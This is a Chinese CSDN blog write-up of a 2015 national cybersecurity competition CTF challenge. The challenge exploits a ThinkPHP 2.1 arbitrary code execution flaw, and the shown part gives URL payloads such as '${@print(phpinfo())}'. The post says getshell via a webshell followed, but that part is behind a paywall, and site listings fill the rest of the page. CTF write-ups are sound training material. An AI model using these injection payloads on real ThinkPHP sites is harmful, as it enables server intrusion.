2015中国网络安全大赛:框架漏洞真题

最新推荐文章于 2024-09-12 14:02:20 发布
最新推荐文章于 2024-09-12 14:02:20 发布
阅读量5.8k 收藏 2
点赞数
分类专栏: CTF题解 文章标签: thinkphp2.1 getshell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/calmegm/article/details/49744519
版权
本文主要介绍了2015年中国网络安全大赛中涉及的ThinkPHP2.1框架漏洞。通过收集信息,发现该网站存在ThinkPHP2.1的任意代码执行漏洞,可以构造特定URL进行利用,如打印版本信息和执行phpinfo()。此外,还展示了如何通过菜刀马链接实现getshell,并提及flag位于html目录下。
摘要由CSDN通过智能技术生成

看题分析:打开网址,是一个后台登录,结合框架漏洞,想到了struts漏洞。

0x00 收集信息

发现网站不是struts架构,于是截包看了下数据,有所发现:


明显是一个ThinkPHP2.1的产品,直接搜索ThinkPHP2.1+漏洞,找到几篇任意代码执行的漏洞。

0x01 任意代码执行漏洞

根据说明(原理网上比较多,我这里就不陈述了,别人分析更好),构造利用URL

www.xxx.com/index.php/module/action/param1/${@print(THINK_VERSION)}


www.xxx.com/index.php/module/action/param1/${@print(phpinfo())}

最低0.47元/天 解锁文章
6um1n
关注
专栏目录
2023年上海市浦东新区网络安全管理员决赛理论题样题
afei001
06-30 890
XHU2NzJjXHU0ZWJhXHU2MjdmXHU2M2E1XHVhXHUwMDMxXHUwMDJlXHUwMDQzXHUwMDRlXHUwMDU2XHUwMDQ0XHU4YmMxXHU0ZTY2XHU2MzE2XHU2Mzk4XHVmZjFiXHVhXHUwMDM0XHUwMDJlXHU2ZTE3XHU5MDBmXHU2ZDRiXHU4YmQ1XHVmZjA4XHU0ZTAwXHU0ZTJhXHU3Y2ZiXHU3ZWRmXHUwMDMxXHUwMDMwXHUwMDMwXHUwMDMwXHUwMDUy
网络安全攻防大赛ctf题目
03-09
网络安全攻防大赛ctf题目
信息安全比赛平台相关收集(CTF比赛)
我的学习笔记
07-12 2440
学习教程与材料: 1、http://www.hackingarticles.in/ 一个外国人的CTF比赛记录博客; 在线实战平台: 1、https://www.hackthebox.eu/home 在线练习题很多,值得看一看,注册时候需要做题的,网上有帮助; 比赛用工具:...
常见框架漏洞详解①!!
muyuchen110的博客
08-07 995
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。
【CTF】 SSTI模板注入漏洞
ZhangAweio的博客
05-29 773
SSTI 就是服务器端模板注入,当前使用的一些框架,比如python的flaskphp的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。
2015中国网络安全大赛:Reinstall
forbidd3n,keep going
11-02 2814
看题分析:网站是一个MAO10 CMS的系统,直接关键字搜索,找到一篇《Mao10CMS前台Getshell》的文章。 0x00 收集信息 在www.mao10.com找到如下说明 //将程序上传到网站空间后,访问 http://你的域名/install.php 进行安装 0x01 install.php 直接加上后缀,直接404,应该没那么简单。既然方向是对的,install文件又
国赛网络安全试题A模块
m0_62689818的博客
11-09 372
网络安全国赛A模块试题
第七届山东省大学生网络安全技能大赛决赛writeup
CoolD's Blog
11-06 7707
先立个flag,以后每次比赛完都要复现写WP…
【2022最新93道网络安全面试题合集】含答案解析
Hack0812的博客
11-18 1919
网络安全最新最全面试题合集,附答案解析、学习资料
网安知识系列:网络安全ctf比赛_学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!...
最新发布
weixin_54626591的博客
09-12 304
网络安全ctf比赛_学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!...
2019全国大学生信息安全第一天线上初赛-情景模拟题(CTF)
04-21
本资料为2019全国大学生信息安全第一天线上初赛-情景模拟题,是个人答题的时候截下来的。分享给有需要的童鞋。
ctf网络安全攻防练习题
12-04
ctf网络安全攻防练习题 从N=NP能得到的结论当然是N=1或者P=0,然后结合图片内容,猜测此题跟二进制01有关,信息应该藏在像素中等等
网络安全、信息安全大赛题目
05-14
信息安全比赛 题目 知识点 有好几个word文档
ctf大赛题目 格式为图片格式
08-03
ctf比赛的部分题目 格式为图片格式 英语 可以上手做联系用................................................................................
中国顶级CTF竞赛网络安全大赛--2022网鼎杯re2解题思路
ALLEN'Blog
03-13 1224
PEID查不出来,用了die,显示是UPX3.96的壳,用了脱壳机,脱不了,只能手动脱壳,拖入x64dbg,F9运行到程序领空,很明显的特征,push:无脑使用ESP定律大法,对ESP下硬件访问断点:F9运行,在pop处停下:F4运行到下面第一个jmp,F8,进去又是一个jmp,继续F8,到达OEP:使用x64dbg插件dump:第一步先dump保存,然后第二步,第三步,第四步选择刚才dump保存的程序:脱壳成功,但是运行一闪而过,这是动态基址搞的鬼,手法很多,有脱壳机有禁用动态基址选项,这里我们直接把程序
CTF入坑日志
Grey的博客
04-25 8587
赛事介绍CTF竞赛模式分为以下三类:一、解题模式(Jeopardy)在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、漏洞挖掘与利用、Web渗透、密码、取证、隐写、安全编程等类别。二、攻防模式(Attack-Defense)在攻防模式CTF赛制...
网络安全工程师必知的75个网络端口(非常详细)从零基础入门到精通,看完这一篇就够了_常用端口
uiuuyy67的博客
04-16 759
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。(img-vYUzaBlZ-1713270115553)]还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
电子设计大赛:09信号类真题预测与技术挑战
【09年电子设计大赛信号类真题预测】包含了三个不同的挑战项目,适合二、三年级的学生参加。这些题目旨在提升参赛者在电子设计方面的实践能力,同时涵盖信号处理、控制理论和光电通信等多个领域。 1. 贪吃蛇游戏...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值